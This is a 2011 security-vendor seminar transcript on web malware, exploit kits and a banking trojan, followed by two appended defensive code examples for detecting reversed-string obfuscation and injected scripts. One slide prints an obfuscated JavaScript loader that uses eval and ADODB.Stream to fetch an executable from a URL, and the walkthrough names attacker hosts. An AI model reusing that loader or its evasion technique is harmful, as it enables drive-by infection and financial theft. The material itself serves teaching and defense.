Protect critical infrastructure by Patrick de Jong
Seminar by Patrick de Jong during Infosecurity.be 2011
Presentation Transcript

  • Protecting your critical infrastructure against web threats. Patrick de Jong, Sales Engineer, Northern Europe
  • Agenda:
    • Critical infrastructure / web threats relation
    • What are we facing (some statistics) and why
    • Spreading the malware
    • How do ‘they’ stay undetected?
    • What harm can ‘they’ do?
    • An example (Phoenix + Banker trojan)
    • The message of the photo (opening slide)
  • Critical infrastructure / Web threats? ‘Everything’ got connected. Digitized control (remote) based on standard OS like Windows or Linux and using standard Ethernet, TCP/IP. Proprietary boxes with push buttons and switches, without any networking/connectivity (later with proprietary OS and networks).
  • Critical infrastructure – Web threats
  • Some statistics (what are we facing). Web-based threats: 92% of new threats come from the Web; 671% increase in Web malware over 2008; 79.9% of Web malware comes from legitimate sites; AV-test currently (01-2011) counted 50 million samples. Source: Websense
  • Some statistics (what are we facing). Web 2.0 landscape: collaboration tools, social networking, enterprise SaaS, social media, media sharing, interactive applications, client sharing, mass comms. Current AV catch rates under 40%*; 52% of malware dead within 24 hours**; 10 billion blended-threat emails per day world-wide*. *Source: M86 Security Labs, **Source: Panda Labs
  • Why? Driven by money. Just as professional as commercial software
  • Why? Driven by money. Joint venture toolkits
  • Why? Driven by money. Data selling
  • Why? Mostly driven by money. Buying & selling ‘victims’
  • Spreading the malware: email spam and malicious websites
  • Spreading the malware: malware distribution via legitimate websites (stolen FTP or hack)
  • Spreading the malware: malware distribution via legitimate websites (stolen FTP or hack)
    • Attacker benefits from someone else’s traffic and reputation
    • Designed to defeat URL filtering & reputation software
    • Most malware is now spread via compromised legitimate sites
  • How ‘they’ stay undetected
  • How they stay undetected: Evasive techniques
  • How they stay undetected: Evasive techniques behind the scenes
  • How they stay undetected: Code obfuscation
    var fname = "C:mssync20.exe";
    var url = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth");
    RE("");
    var _r = RE(";)tcejbo(tnemelEetaerc.tnemucod");
    RE(";)r_,di(etubirttAtes.r_");
    RE(";)63E92CF40C00-A389-0D11-3A56-655C69DB:dislc,dissalc(etubirttAtes.r_");
    var is_ok = 0;
    try { var _s = RE(";),maerts.bdoda(tcejbOetaerC.r_"); is_ok = 1; } catch(e){}
    if (is_ok != 1) {
      try { var _s = RE(";)maerts.bdoda(tcejbOXevitcA wen"); is_ok = 1; } catch(e){}
    }
    // RE reverses its argument and evaluates the result; RV is the string reverser
    function RE(s) { return eval(RV(s)); }
    function RV(s) {
      var rev = "";
      for (i = 0; i < s.length; i++) { rev = s.charAt(i) + rev; }
      return rev;
    }
  • How they stay undetected: Code obfuscation. Reversed malicious code – undetected!! ‘Actual’ malicious code – detected (7 out of 31)
  • How they stay undetected: Dynamic code obfuscation
  • How they stay undetected: Dynamic code obfuscation
  • How they stay undetected: Private exploit encryption. NeoSploit infection process:
    • <malicious IFRAME>
    • Generating obfuscated JS
    • Generating a key and sending it to the server
    • Using the key to generate an encrypted script that is sent back to the client
    • The browser opens the encrypted script with the key and executes the JS code
  • Toolkits/Trojans/C&C: What can they do with it
  • Toolkits/Trojans/C&C: What can they do with it
  • Example: banking trojan – Money mules
  • Example: banking trojan. Legitimate websites: video2mp3.net, msgdiscovery.com, everythingon.tv, …. Using stolen FTP accounts, the cyber gang managed to inject an Iframe that leads to the Phoenix Exploit Kit on thousands of legitimate websites.
  • Example: banking trojan. Legitimate websites: video2mp3.net, msgdiscovery.com, everythingon.tv, …. The user accesses a compromised website. The website content contains a redirection to the Phoenix Exploit Kit. The user is redirected to the Phoenix Exploit Kit 2.3: http://fan******.net/.ph/5. The user’s PC is exploited; the payload was downloaded successfully.
  • Example: banking trojan. Legitimate websites: video2mp3.net, msgdiscovery.com, everythingon.tv, …. Compromised website. The malware downloads a configuration file from hxxp://uste*****.com.tr/Scripts/rd.bin. This specific configuration file contains injection orders that will be used when the user accesses the bank.
  • Example: banking trojan. Legitimate websites: video2mp3.net, msgdiscovery.com, everythingon.tv, …. Compromised website, Google. Before the Trojan accesses the Command & Control server it verifies that the user’s PC is connected to the internet (http://google.com/webhp). After a successful connection test, the bot reports to the C&C server about the new installation: hxxp://195.***.**.147:3128/data/set.php. The gang doesn’t want to uncover the main C&C to the world and uses the Exploit Kit server as a proxy to the main C&C server.
  • Example: banking trojan. Legitimate websites: video2mp3.net, msgdiscovery.com, everythingon.tv, …. Compromised website, Google. Besides the Trojan banker, the server sends the user another malware – Fake AV. The gang operates in multiple vectors; using social engineering it tries to convince the user to buy fake AV.
  • Example: banking trojan. Financial institution. The Trojan holds until the user accesses the bank. The Trojan adds a script (on the client side) to every page in the website. Of course the script is not located on the server, and the user is redirected to the C&C to download it: hxxp://cheap********card.info/brap/bscript.js
  • Example: banking trojan. Financial institution. From that point the Trojan supervises all user activity with the bank. The moment the user tries to commit a transaction, the bot communicates with the C&C and receives full information about the new transaction that the bot is intending to commit. The bot replaces the details in the ‘transaction submit form’ and sends it to the server.
  • Example: banking trojan. Financial institution. An example of a successful transaction generated by the Trojan to the money mule account.
  • The photo
  • Patrick de Jong, Sales Engineer Northern Europe. Phone: +31 33 454 3533. Mobile: +31 6 1373 2964. Email: patrick.dejong@m86security.com
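The code-obfuscation slides above show the trick that got the sample past 24 of 31 engines: every sensitive call is stored backwards and only reversed inside eval(). The following is an added example, not code from the slides or from M86, of the defender's counterpart: a static scanner that pulls the string literals out of a script, reads each one backwards as well as forwards, and reports which sensitive API names only appear once the string is reversed. The token list, the regexes and both sample snippets are this example's own assumptions; the SAMPLE snippet is constructed to mirror the slide's RV/RE pattern.

```javascript
// Added example: static de-obfuscation of "reversed string + eval" JavaScript.
// Not part of the original slides; tokens, regexes and samples are assumptions.

// Indicators worth flagging once a string is read the right way round
// (compared case-insensitively).
const SUSPICIOUS_TOKENS = [
  "activexobject",
  "adodb.stream",
  "document.createelement",
  "setattribute",
  "classid",
  "http://",
];

// Double- or single-quoted JS string literal, honouring backslash escapes.
const STRING_LITERAL_SRC = '"((?:[^"\\\\]|\\\\.)*)"|\'((?:[^\'\\\\]|\\\\.)*)\'';
const EVAL_USE = /\beval\s*\(/;

function reverse(s) {
  return s.split("").reverse().join("");
}

function matchTokens(text) {
  const lower = text.toLowerCase();
  return SUSPICIOUS_TOKENS.filter((t) => lower.includes(t));
}

// Returns every literal that matches a token either as written ("plain")
// or only after reversal ("hidden"), plus whether eval() is used at all.
function scanSource(source) {
  const re = new RegExp(STRING_LITERAL_SRC, "g"); // fresh regex per call: no shared lastIndex
  const hidden = [];
  const plain = [];
  let m;
  while ((m = re.exec(source)) !== null) {
    const literal = m[1] !== undefined ? m[1] : m[2];
    if (literal.length === 0) continue;
    const direct = matchTokens(literal);
    if (direct.length > 0) {
      plain.push({ original: literal, decoded: literal, tokens: direct });
      continue;
    }
    const decoded = reverse(literal);
    const viaReverse = matchTokens(decoded);
    if (viaReverse.length > 0) {
      hidden.push({ original: literal, decoded, tokens: viaReverse });
    }
  }
  return { usesEval: EVAL_USE.test(source), hidden, plain };
}

// Triage rule: sensitive APIs that are only visible backwards, combined with
// eval(), is the exact pattern from the slide and gets the strongest verdict.
function verdict(source) {
  const r = scanSource(source);
  if (r.usesEval && r.hidden.length > 0) return "suspicious: eval over reversed strings";
  if (r.hidden.length > 0) return "review: reversed strings match sensitive APIs";
  return "clean";
}

// Constructed sample shaped like the slide's loader (URL is made up).
const SAMPLE = `
var url = RV("exe.daolyap/ten.elpmaxe//:ptth");
var _r = RE(";)tcejbo(tnemelEetaerc.tnemucod");
try { var _s = RE(";)maerts.bdoda(tcejbOXevitcA wen"); } catch(e){}
function RE(s) { return eval(RV(s)); }
function RV(s) { var rev = ""; for (var i = 0; i < s.length; i++) { rev = s.charAt(i) + rev; } return rev; }
`;

// Constructed benign sample: real DOM call, but not hidden in a string and no eval().
const BENIGN = `
var greeting = "hello";
var box = document.createElement("div");
box.textContent = greeting;
`;

console.log(verdict(SAMPLE));
for (const f of scanSource(SAMPLE).hidden) console.log(f.decoded, f.tokens);
console.log(verdict(BENIGN));
```

The scanner deliberately reports the decoded string alongside the original, so an analyst sees the real URL or API call without ever executing the sample; extending it to other one-step encodings (base64, String.fromCharCode runs) is a matter of adding a decoder next to reverse() and trying each candidate against the same token list.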
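The banking-trojan slides describe the Trojan adding a script to every page of the bank's site on the client side, fetched from an attacker host rather than from the bank. The following is an added example, not code from the slides or from M86, of how a bank's front end can inventory the scripts present on a page and flag the ones that are not on its allowlist: external scripts are checked by origin, inline scripts by SHA-256 hash. The origins, the inline snippet and the page inventory are constructed for the example; the "cheap-card.example" entry stands in for the injected loader from the slide and is not a real host.

```javascript
// Added example: auditing a page's script inventory against an allowlist.
// Not part of the original slides; all names and values below are assumptions.
const crypto = require("crypto");

function sha256Hex(text) {
  return crypto.createHash("sha256").update(text, "utf8").digest("hex");
}

// Resolve a src against the page so relative paths like "/js/app.js"
// map to the bank's own origin; return null if it cannot be parsed.
function originOf(src, pageOrigin) {
  try {
    return new URL(src, pageOrigin).origin;
  } catch (e) {
    return null;
  }
}

// scripts: array of { src: "..." } for external scripts or { inline: "..." }
// for inline ones, in document order (what a DOM walk over <script> yields).
// Returns one finding per script that is not covered by the allowlists.
function auditScripts(scripts, pageOrigin, allowedOrigins, allowedInlineHashes) {
  const origins = new Set(allowedOrigins);
  const hashes = new Set(allowedInlineHashes);
  const findings = [];
  scripts.forEach((s, index) => {
    if (s.src !== undefined) {
      const origin = originOf(s.src, pageOrigin);
      if (origin === null) {
        findings.push({ index, reason: "unparseable src", src: s.src });
      } else if (!origins.has(origin)) {
        findings.push({ index, reason: "unexpected origin", src: s.src, origin });
      }
    } else if (s.inline !== undefined) {
      const sha256 = sha256Hex(s.inline);
      if (!hashes.has(sha256)) {
        findings.push({ index, reason: "unknown inline script", sha256 });
      }
    }
  });
  return findings;
}

// Constructed allowlist for a hypothetical bank.
const PAGE_ORIGIN = "https://bank.example";
const ALLOWED_ORIGINS = ["https://bank.example", "https://static.bank.example"];
const KNOWN_INLINE = "window.appConfig = { locale: 'en' };";
const ALLOWED_INLINE_HASHES = [sha256Hex(KNOWN_INLINE)];

// Constructed inventory of one page as the browser rendered it: three
// legitimate entries, then an injected external loader and an injected inline block.
const PAGE_SCRIPTS = [
  { src: "/js/app.js" },
  { src: "https://static.bank.example/js/vendor.js" },
  { inline: KNOWN_INLINE },
  { src: "https://cheap-card.example/brap/bscript.js" }, // stands in for the slide's injected loader
  { inline: "/* injected: not on the allowlist */ loadExtra();" },
];

function auditSamplePage() {
  return auditScripts(PAGE_SCRIPTS, PAGE_ORIGIN, ALLOWED_ORIGINS, ALLOWED_INLINE_HASHES);
}

for (const f of auditSamplePage()) console.log(f);
```

Because the Trojan sits in the browser, an audit that runs in the same browser can itself be tampered with; its value is as a telemetry source, reporting findings to the bank's back end where they can be correlated across many sessions, not as a gate. A Content-Security-Policy script-src allowlist expresses the same origin and hash rules declaratively and is enforced by the browser before the script runs.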